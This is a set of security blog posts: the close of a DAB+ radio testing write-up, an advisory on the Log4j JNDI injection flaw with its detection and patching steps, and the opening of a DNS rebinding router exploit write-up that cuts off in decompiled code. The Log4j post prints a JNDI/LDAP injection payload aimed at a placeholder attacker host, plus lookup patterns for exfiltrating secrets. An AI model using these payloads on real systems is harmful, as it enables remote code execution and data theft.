href="https://blogger.googleusercontent.com/img/a/AVvXsEi-n8WiaoeeYup2cAn9D5z1ZUwBwcli0dbC8qQaoDtXZPkoAwHMa3At73nEvaP6IP5d16Cl1tnxx7pkf4fQw12iOkP7k7scA9Eyiyqvegatq4gsCRAsLwXSavxeftoyVrx_Un5heQT9CyLUq2t60E8EDcof8ospFYCVTcFLYvrZ_FOVgaxn_GWSlpdK" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="522" data-original-width="959" height="217" src="https://blogger.googleusercontent.com/img/a/AVvXsEi-n8WiaoeeYup2cAn9D5z1ZUwBwcli0dbC8qQaoDtXZPkoAwHMa3At73nEvaP6IP5d16Cl1tnxx7pkf4fQw12iOkP7k7scA9Eyiyqvegatq4gsCRAsLwXSavxeftoyVrx_Un5heQT9CyLUq2t60E8EDcof8ospFYCVTcFLYvrZ_FOVgaxn_GWSlpdK=w400-h217" width="400" /></a></p><p>and has already at least one known real <a href="https://www.theregister.com/2022/02/10/mazda_radios_images/" target="_blank">world issue</a>. </p></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEjVkSxBWvH1pj-pmbH0XkIGw5nhS0BKHC2nIz9t44uDQMv7oS0V-OqtDWLEOwE3-v8LeDnVNuXBUA4BFpXfsIZ_P9wb6mpJpk2zs6zEqT41rI_smiQQkFFhstXueKUGofURZSgMrl1R4xm9jWxfIRuclqjgUIy9pKHO7zxP5qFi7Us7i1csvD-KeJ6S" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="314" data-original-width="745" height="169" src="https://blogger.googleusercontent.com/img/a/AVvXsEjVkSxBWvH1pj-pmbH0XkIGw5nhS0BKHC2nIz9t44uDQMv7oS0V-OqtDWLEOwE3-v8LeDnVNuXBUA4BFpXfsIZ_P9wb6mpJpk2zs6zEqT41rI_smiQQkFFhstXueKUGofURZSgMrl1R4xm9jWxfIRuclqjgUIy9pKHO7zxP5qFi7Us7i1csvD-KeJ6S=w400-h169" width="400" /></a></div><br /><br /></div><div>Next step was to identify a number of possible threats and attacks by studying the DAB+ specifications, a subset of tests was shown during the talk:</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEifiUjuR3a6anTy02t3Up95xBVMBt2yqnFAtrXjDsCyuyyCo6ES3-mvRKAvxyhWZA2iTeEUKJ_6Sv9omhQShjUP7OHncVjtP3LcoFsG6Yhyu7piMxmZaaEdoFK8YX9QLx6VTnHAmHMfo-eD0_N13gnXaCVSB9nRg1kdP0aYxDk1mZDmHA7GQn99wn06" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="349" data-original-width="802" height="139" src="https://blogger.googleusercontent.com/img/a/AVvXsEifiUjuR3a6anTy02t3Up95xBVMBt2yqnFAtrXjDsCyuyyCo6ES3-mvRKAvxyhWZA2iTeEUKJ_6Sv9omhQShjUP7OHncVjtP3LcoFsG6Yhyu7piMxmZaaEdoFK8YX9QLx6VTnHAmHMfo-eD0_N13gnXaCVSB9nRg1kdP0aYxDk1mZDmHA7GQn99wn06" width="320" /></a></div><br /></div><div style="text-align: left;">Apart from creating <b>filenames with no extension</b>, we identified several more possible attacks on parsers such as creating malformed unicode filenames, EPG, Journaline and other DAB+ defined formats.</div><div style="text-align: left;">The stumbling blocks when going practical was that some of those formats were not implemented by the receivers we tested, so we decided to keep the tests for future activities.</div><h3 style="text-align: left;">Results</h3><div>The most interesting issues were found on DAB+ desktop software, resulting in path traversal and HTML injection.</div><div><br /></div><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/a/AVvXsEir56guXWYS-tzk8SnAHLpMriSsQqtiQVqgjFWVSZyT0_Oi9uqBaSpPqj6YXdiWH-X5LEZaO1xuILvecCQRc04L-5o7RLCtnq0idDPUy6GBeS0E8R7nz9QhUkn1cgeRDthw-Kciw0wDBm01NykOl7PsfJjYkQ2e3ZVOgKvEnBarZvbr_Zd_jDlyZEcj" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="454" data-original-width="915" height="159" src="https://blogger.googleusercontent.com/img/a/AVvXsEir56guXWYS-tzk8SnAHLpMriSsQqtiQVqgjFWVSZyT0_Oi9uqBaSpPqj6YXdiWH-X5LEZaO1xuILvecCQRc04L-5o7RLCtnq0idDPUy6GBeS0E8R7nz9QhUkn1cgeRDthw-Kciw0wDBm01NykOl7PsfJjYkQ2e3ZVOgKvEnBarZvbr_Zd_jDlyZEcj" width="320" /></a></div><br /><br /></div><div><br /></div><div>Unfortunately, the lack of head units or vehicles prevented us to perform more thorough tests to get some more juicy stuff..</div><div>Let's see what the next weeks will give back, since we are expecting new hardware to perform more tests!</div><div><br /></div><div>PS. We were expecting to have a video of the talk to publish, but it's not clear when and if.. so here are the slides of the talk:</div><div><a href="https://mindedsecurity.com/wp-content/uploads/2022/07/DIPAOLA_IMQ_VTM_2022.pdf" target="_blank">"<b>UN ECE 155 Threats in the real world: Wireless Networking Attacks and Mitigations. A case study</b>"</a></div><div><br /></div><div>Feel free to comment or <a href="https://mindedsecurity.com/contact-us/">contact us</a> for any question!</div>Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-20165431623214652192021-12-14T05:47:00.037-08:002021-12-23T06:49:01.391-08:00The Worst Log Injection. Ever. (Log4j [2.0.0-alpha,2.14.1] )<p></p><div class="separator" style="clear: both;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ_5pfkS1cqvswDQyDQPApPaJuMKVDynjevtlYpB5lb-d1hGSsI-_XWxLlDnojb1ShTL7q1gwDRLKjVrjet9moWUyVAUCN1UXWIsp-7wFhgHqVd5EeUQ7oPVPwzLRWpK8319Wq5216Q4/" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img alt="" data-original-height="160" data-original-width="512" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjPZ_5pfkS1cqvswDQyDQPApPaJuMKVDynjevtlYpB5lb-d1hGSsI-_XWxLlDnojb1ShTL7q1gwDRLKjVrjet9moWUyVAUCN1UXWIsp-7wFhgHqVd5EeUQ7oPVPwzLRWpK8319Wq5216Q4/" width="320" /></a></div><div style="text-align: left;"><span style="text-align: left;">There has been such a <a href="https://twitter.com/search?q=%23log4shell" target="_blank">hype</a> about the Log4j issue and since <a href="http://mindedsecurity.com/" target="_blank">IMQ Minded Security</a> mission has always been about fixing, this informal post is about </span><i style="text-align: left;">what's going on</i><span style="text-align: left;">, </span><i style="text-align: left;">how to check</i><span style="text-align: left;"> if someone's system is likely affected and </span><i style="text-align: left;">how to fix the issue</i><span style="text-align: left;">.<br /><br /></span></div><div style="text-align: left;"><span style="text-align: left;"><b><u>UPDATE 12-17-2021</u></b>: Since several bypasses to the mitigations </span><span>implemented on version 2.15/16 were found, <b><u>be sure to update to </u></b></span><b><u>Log4j 2.3.1 (for Java 6), 2.12.3 (for Java 7), or 2.17.0 (for Java 8 and later) as described <a href="https://logging.apache.org/log4j/2.x/security.html" target="_blank">here</a> and <a href="https://logging.apache.org/log4j/2.x/" target="_blank">here</a> ASAP!</u></b></div></div><h3 style="text-align: left;"><b>What's the Buzz? (The Problem)</b></h3><div style="text-align: left;">On Thursday 12/09/2021 a <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228">vulnerability</a> affecting a very popular logging Java library was published on <a href="https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce" target="_blank">Github</a>. A few hours later the infosec community <a href="https://www.lunasec.io/docs/blog/log4j-zero-day/" target="_blank">was</a> <a href="https://twitter.com/search?q=%23log4shell" target="_blank">on fire</a>.</div><div style="text-align: left;"><br />The issue falls in the category of <i><a href="https://cwe.mitre.org/data/definitions/1336.html" target="_blank">Template Language Injection</a></i>, which involves a parser that is triggered to perform certain actions when particular sequences are found in the parsed string.</div><div style="text-align: left;"><br />The library is <a href="https://logging.apache.org/log4j/2.x/">Log4j</a> and the vulnerable methods (sinks) are the ones that are usually called to actually log messages in files to keep track of events happening during the execution of an application:</div><ul style="text-align: left;"><blockquote><li>log</li><li>fatal</li><li>error</li><li>warn</li><li>trace</li><li>..</li></blockquote></ul><p></p><div style="text-align: left;">(for a more technical code insight <a href="https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/" target="_blank">https://y4y.space/2021/12/10/log4j-analysis-more-jndi-injection/</a>). </div><div style="text-align: left;"><br /></div><div style="text-align: left;">It means that, if the application wants to log some dynamic content coming from an external source, such as, <i>a message about an error login</i> from a non existing username, it might call something like:</div><blockquote><p>logger.warn(username + " not found!");</p></blockquote><div style="text-align: left;">If the username value is controlled by a malicious user it will be possible to exploit the vulnerability and even execute arbitrary code on the affected platform.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">In particular, if an attacker is able to control the log message string, even partially, and he is able to inject the '<b><i>${</i></b>' and '<i><b>}</b></i>' metacharacters the Log4j I<a href="https://github.com/apache/logging-log4j2/blob/master/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java" target="_blank">nterpolator</a> will parse the content and look for <u><a href="https://github.com/apache/logging-log4j2/blob/master/log4j-core/src/main/java/org/apache/logging/log4j/core/lookup/Interpolator.java#L103" target="_blank">specific patterns</a></u>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">According to the Interceptor class the <u>following patterns</u> are enabled by default:</div><blockquote><li>log4j</li><li>sys </li><li>env</li><li>main</li><li>marker</li><li>java</li><li>lower</li><li>upper</li><li>date</li><li>ctx</li><li>jndi (if org.apache.logging.log4j.core.lookup.JndiLookup is present)</li><li>web (if org.apache.logging.log4j.web.WebLookup is present)</li><li>docker </li><li>spring</li><li>kubernetes</li></blockquote><p> </p><div style="text-align: left;">So, the real deal is about an attack that can be performed via JNDI:LDAP keyword (or similar patterns such as RMI, COS etc..). In fact by injecting something like:</div><p></p><blockquote>${jndi:ldap://EVILLDAP:[PORT]/XX}</blockquote><p></p><p>as argument in the sink method, Log4j will:</p><p></p><ol style="text-align: left;"><li>trigger a DNS request to check if the EVILLDAP hostname needs to be resolved</li><li>perform an LDAP request to the (attacker controlled) LDAP server hosted on the resolved IP</li><li>the attacker controlled LDAP server will then be able to reply with a malicious serialized Java object, which will be executed on the Log4j side.</li><li>if the malicious object, by abusing internal features (gadgets), is able to trigger the correct set of instruction, the vulnerability will be successfully exploited.</li></ol><p></p><div style="text-align: left;">As can be noted, <b>this is a two stages attack, </b>in fact, after the vulnerability is triggered, the vulnerable application needs to send a request to the malicious server in order to get the RCE payload.</div><div style="text-align: left;"><br /></div><h3 style="text-align: left;"><b>What's the Impact and How about the Risk? (</b><b>The Attack)</b></h3><p>The worst <b>impact</b> is the <i><u>Remote Code Execution</u></i>, which requires:</p><p></p><ol style="text-align: left;"><li><i>the victim machine must be able to perform outbound requests </i></li><li><i>the attacker must be able to use the correct gadget chain to successfully perform the attack.</i></li></ol><div> <u>Another important</u> <b>impact</b> involves <u><i>Exfiltration of Confidential Information</i></u> via other pattern such as:</div><div><ul style="text-align: left;"><blockquote><li>env:KEY</li><li>sys:KEY</li><li>ctx:KEY</li><li>web:KEY</li><li>..</li></blockquote></ul></div><div>In conjunction with DNS Requests or other layer 7 requests.</div><div>Which requires that:</div><div><ol style="text-align: left;"><li>the victim machine is allowed to perform DNS requests or perform outbound requests </li></ol><div>In this second attack the attacker will be able to gather information such as internal cryptography keys or similar data from application mapped strings.<br /><br /></div></div><p></p><h3 style="text-align: left;"><b>Which Version is Affected?</b></h3><div style="text-align: left;">All version of <i>Apache Log4j 2 until 2.15 excluded</i> are affected. <br /><br /></div><div style="text-align: left;">In particular: <b>2.0-beta9 <= Apache Log4j <= 2.14.1</b></div><div style="text-align: left;"><b><br /></b></div><div style="text-align: left;"><u>Log4j version 1 might be affected in some specific case if JNDI is enabled, but it is not by default.</u></div><div style="text-align: left;"><u><br /></u></div><div style="text-align: left;"><b>WARNING</b>: there is a bunch of blog posts asserting that <b>some Java version mitigates</b> the attacks, but that is <b>NOT true</b>.<b> The vulnerability is independent on the Java version.<br /><br /></b></div><h3 style="text-align: left;"><b>Am I Vulnerable? (The Check)</b></h3><div style="text-align: left;">There are several ways to check if some of the deployed application is vulnerable...the correct answer would be implement <a href="https://en.wikipedia.org/wiki/Supply_chain_management" target="_blank">Supply Chain Management</a>, but this paragraph is for practical, urgent actions.</div><p>If you've already implemented a process which allows to list:</p><p></p><ul style="text-align: left;"><li>*<b>All</b>* your applications and versions</li><li>*<b>Where</b>* they are deployed</li></ul><div style="text-align: left;">That list is called <a href="https://en.wikipedia.org/wiki/Software_bill_of_materials" target="_blank">SBOM (Software Bill of Materials)</a> which list of all the used software, libraries included and their versions.<br />If you have it, there are very good chances that the time spent to find & fix everything will be relatively small.</div><div><p>But, of course, having it depends on the maturity of the security process implemented in your company (check <a href="https://mindedsecurity.com/services/consulting/5d-framework/" target="_blank">this</a> out if you're interested in our <a href="https://mindedsecurity.com/our-services/consulting/">services</a>).</p><div style="text-align: left;">Consider an enterprise without a SBOM. They might have hundreds of deployed software from external vendors and internally developed custom software. Meaning it will require a big effort of time and resources to prioritize and patch.</div><p>If <i><u>no SBOM is in place</u></i> then, the first thing to do is to roll up your sleeves and <i>for each instance</i>:</p><p></p><blockquote><p></p><ol style="text-align: left;"><li>Login</li><li>Check if there are running processes using java.</li><li>Identify the directories and use the open source <a href="https://github.com/jeremylong/DependencyCheck/releases/" target="_blank">OWASP Dependency Check</a> (or similar products).</li></ol><p></p><p></p></blockquote><div style="text-align: left;"><i>OWASP Dependency Check</i> is able to recursively check for vulnerable libraries in a <u>EAR/WAR/JAR </u>deployed applications and also other files like <i>POM.xml</i>.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Finally, have a look at the <a href="https://github.com/curated-intel/Log4Shell-IOCs" target="_blank">Indicator Of Compromise</a> list that might help in case there's already been a security incident.<br /><br /></div><h3 style="text-align: left;">How can I mitigate the risk? (The Fix)</h3></div><div><b>The permanent ones</b>:</div><div><ul style="text-align: left;"><li>For <a href="https://www.ibm.com/blogs/psirt/an-update-on-the-apache-log4j-cve-2021-44228-vulnerability/" target="_blank">each</a> <a href="https://twitter.com/GossiTheDog/status/1470056396968374273/photo/1" target="_blank">affected</a> <a href="https://github.com/NCSC-NL/log4shell/tree/main/software" target="_blank">vendor</a> you should ping them, <u>asking for a patch or minor release</u>. If they tell you that you must update to a major release and your product is not EOL, you should insist for a minor/patch level release which addresses the vulnerability.</li><li>For each internal application update Log4j library to version <b>2.16</b>.</li><ul><li>WARNING: Log4j <b>2.16</b> requires Java 8, so if you have Java < 8 there might be some more time consuming effort. In that case see if the following workaround is worth trying.</li></ul></ul></div><div><br /></div><div><b>The workarounds:</b></div><div><ul style="text-align: left;"><li>if <b>Log4j version >= 2.10</b>, <a href="https://logging.apache.org/log4j/2.x/security.html" target="_blank">as explained here</a>, you can do the following steps:</li><ol><li>export the following ENVIRONMENT VARIABLE to the whole OS as LOG4J_FORMAT_MSG_NO_LOOKUPS=true</li><li>relaunch the application.</li><li>Check if you're still vulnerable with a POC.</li></ol><li>For each affected machine:</li><ul><li>if <b>it's not supposed</b> to generate egress traffic <b>block</b> <u>DNS requests</u> and <u>new outbound traffic</u>.</li><li>if <b>it's supposed</b> to generate outbound traffic, well...that falls into <b>anomaly detection</b> category, which could help but be sure that it is not a fingerprint based one since there's a <a href="https://twitter.com/Rezn0k/status/1469523006015750146" target="_blank">lot</a> of <a href="https://github.com/woodpecker-appstore/log4j-payload-generator" target="_blank">ways</a> to bypass blocking rules.</li><li>last but not least it might be interesting to experiment some kind of RASP, <a href="https://github.com/corretto/hotpatch-for-apache-log4j2" target="_blank">such as this one</a>, which will be able to identify contextual traffic without the risk of bypasses.</li></ul></ul><div>Here's a nice InfoGraphics about the attack flow and the points of mitigation from <a href="https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/" target="_blank">GovCert.CH</a>:</div></div><h3 style="text-align: left;"><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-Exzr5ukFDFaFJyintBwh6L_pKOV5ZWhyphenhyphenAXeKC1oAIud14Hn1tAMG9rz-kZGlOzDuXEYtTiYYh2N7WqxmtZNhdXA1RmHBwkoLg8aoKJKM9F7D9C3KG6M1YmBijHcxduw31BSKza2msc/" style="margin-left: 1em; margin-right: 1em;"><img alt="" data-original-height="814" data-original-width="1204" height="216" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhF-Exzr5ukFDFaFJyintBwh6L_pKOV5ZWhyphenhyphenAXeKC1oAIud14Hn1tAMG9rz-kZGlOzDuXEYtTiYYh2N7WqxmtZNhdXA1RmHBwkoLg8aoKJKM9F7D9C3KG6M1YmBijHcxduw31BSKza2msc/" width="320" /></a></div><br /><br /></h3><h3 style="text-align: left;">Conclusions</h3><div>This post was written in order to give some clarification about the CVE-2021-44228 and to give some thoughtful information regarding attacks, checks and fixes. </div><div>Please comment/email us if you need more clarifications.</div><div><br /></div>Stefano Di Paolahttp://www.blogger.com/profile/11966634329749157589noreply@blogger.com0tag:blogger.com,1999:blog-7122745763234660283.post-50804812520495002092021-08-31T01:17:00.006-07:002021-08-31T01:21:40.587-07:00A Journey Into the Beauty of DNSRebinding - Part 2<h4 style="text-align: left;"><b><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUbwqScaadVAeGqh3JSxLZaH936SBrNxYcarxTAfoYRcIIQ_JkbhqxYQL8JweFLYA3rtyNpQJw5shaJuNyzQ0V2BHSJvSdwPG18x0__WARFFboPLK3Bbx2Wytckpk73VP82HW9ghG861B/s253/DNS_2.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="225" data-original-width="253" height="225" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFUbwqScaadVAeGqh3JSxLZaH936SBrNxYcarxTAfoYRcIIQ_JkbhqxYQL8JweFLYA3rtyNpQJw5shaJuNyzQ0V2BHSJvSdwPG18x0__WARFFboPLK3Bbx2Wytckpk73VP82HW9ghG861B/s0/DNS_2.jpg" width="253" /></a></div><br /><span style="font-family: helvetica;"><br /></span></b></h4><h4 style="text-align: left;"><b><span style="font-family: helvetica;">Abstract</span></b></h4><p style="text-align: left;"><span style="font-family: helvetica;">In the <a href="https://blog.mindedsecurity.com/2021/02/journey-into-beauty-of-dnsrebinding.html" target="_blank">first</a> part, after a fast overview on the <i>DNS Rebinding</i> technique, we considered a practical example in which UPnP services has been exploited to perform NAT Injection attacks and, therefore, expose internal services on Internet.</span></p><p style="text-align: left;"><span style="font-family: helvetica;">In this second post we are going to demonstrate how <i>DNS Rebinding</i> could be used to exploit vulnerable services running locally in order to achieve Remote Code Execution (RCE). </span></p><p style="text-align: left;"><span style="font-family: helvetica;">In particular, we will consider the case of <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" target="_blank">CVE-2016-6563</a>, which consists in a known Buffer Overflow issue caused by an unsafe parsing of the XML fields present in the login SOAP request affecting the HNAP service of some D-Link routers.</span></p><p style="text-align: left;"><span style="font-family: helvetica;">In short, below are listed the steps in order to create a working <i>DNS Rebinding</i> proof of concept:</span></p><div><div style="text-align: left;"><ul style="text-align: left;"><li><span style="font-family: helvetica;">Firmware static and dynamic analysis;</span></li><li><span style="font-family: helvetica;">Buffer Overflow sink and source identification through static binary analysis;</span></li><li><span style="font-family: helvetica;">Exploit development through binary emulation;</span></li><li><span style="font-family: helvetica;">DNS Rebinding + Buffer Overflow ROP exploit chaining.</span></li></ul></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span></div><div style="text-align: left;"><span style="font-family: helvetica;"><br /></span><h4 style="box-sizing: border-box; break-after: avoid-page; break-inside: avoid; clear: both; letter-spacing: -1px; line-height: 1.5rem; margin: 0px 0px 1.5rem; overflow-wrap: break-word; padding: 0px; position: relative; text-align: left; white-space: pre-wrap;"><span class="md-plain" md-inline="plain" style="box-sizing: border-box;"><span style="font-family: helvetica;">Static Firmware and Binary Analysis</span></span></h4><span style="font-family: helvetica;">As a first step, we downloaded the "DIR-842_C1_FW300b18.bin" firmware, which was available on the vendor site, and extracted the <i>squash-fs</i> filesystem by using <i>binwalk</i>.<br /></span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="font-family: helvetica;"><span class="md-plain md-expand" md-inline="plain"><pre cid="n63" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="bash" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">$ binwalk</span> <span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-e</span> DIR-842_C1_FW300b18.bin </span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">DECIMAL HEXADECIMAL DESCRIPTION</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">--------------------------------------------------------------------------------</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">0</span> 0x0 DLOB firmware header, boot partition: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"dev=/dev/mtdblock/5"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">112</span> 0x70 uImage header, header size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span> bytes, header CRC: 0x6A7785EB, created: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2017</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-05-19</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">16</span>:57:27, image size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1226247</span> bytes, Data Address: 0x80060000, Entry Point: 0x80060000, data CRC: 0xCD5C9222, OS: Linux, CPU: MIPS, image type: Multi-File Image, compression type: lzma, image name: <span class="cm-string" style="box-sizing: border-box; color: #d26b6b;">"MIPS Seattle Linux-3.3.8"</span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">184</span> 0xB8 LZMA compressed data, properties: 0x6D, dictionary size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">8388608</span> bytes, uncompressed size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">3616252</span> bytes</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1245296</span> 0x130070 PackImg section delimiter tag, little endian size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">15765760</span> bytes; big endian size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">9564160</span> bytes</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">1245328</span> 0x130090 Squashfs filesystem, little endian, version <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4</span>.0, compression:xz, size: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">9563526</span> bytes, <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2480</span> inodes, blocksize: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">131072</span> bytes, created: <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">2017</span><span class="cm-attribute" style="box-sizing: border-box; color: #7575e4;">-05-19</span> <span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">16</span>:57:32</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span></pre></span><br />Then we stared to inspect the "hnap" binary inside the filesystem and we found the same behavior described in <a href="https://nvd.nist.gov/vuln/detail/CVE-2016-6563" target="_blank">CVE-2016-6563</a>.<span class="md-plain md-expand" md-inline="plain"><br /></span></span></div><div><span style="font-family: helvetica;"><br /></span></div><div><span style="box-sizing: border-box; font-family: helvetica;">We have then reversed the target binary with <i>Ghidra</i> and, by looking for the the strings related to the login parameters, we have identified the following function, which was renamed as "Vulnerable" in the following snippet of code.</span></div><div><span style="font-family: helvetica;"><br /></span><pre cid="n65" class="md-fences md-end-block ty-contain-cm modeLoaded" lang="c" mdtype="fences" spellcheck="false" style="background: rgb(51, 51, 51); box-sizing: border-box; break-inside: avoid; color: #b8bfc6; font-size: 0.9rem; margin-bottom: 20px; margin-top: 0px; overflow: visible; padding: 10px 10px 10px 30px; position: relative; white-space: normal; width: inherit;"><span style="font-family: helvetica;"><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-def" style="box-sizing: border-box; color: #8d8df0;">Vulnerable</span>(<span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">param_1</span>)</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"><span cm-text="" style="box-sizing: border-box;"></span></span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;">{</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">uVar1</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">int</span> <span class="cm-variable" style="box-sizing: border-box;">iVar2</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">size_t</span> <span class="cm-variable" style="box-sizing: border-box;">sVar3</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">pcVar4</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_758</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_750</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">local_74c</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">*</span><span class="cm-variable" style="box-sizing: border-box;">local_748</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined</span> <span class="cm-variable" style="box-sizing: border-box;">auStack1860</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">4</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined4</span> <span class="cm-variable" style="box-sizing: border-box;">local_740</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1852</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">80</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1772</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">144</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1628</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: border-box;">acStack1564</span> [<span class="cm-number" style="box-sizing: border-box; color: #64ab8f;">64</span>];</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable" style="box-sizing: border-box;">undefined2</span> <span class="cm-variable" style="box-sizing: border-box;">local_5dc</span>;</span><br /><span role="presentation" style="box-sizing: border-box; padding-right: 0.1px;"> <span class="cm-variable-3" style="box-sizing: border-box; color: #1cc685;">char</span> <span class="cm-variable" style="box-sizing: 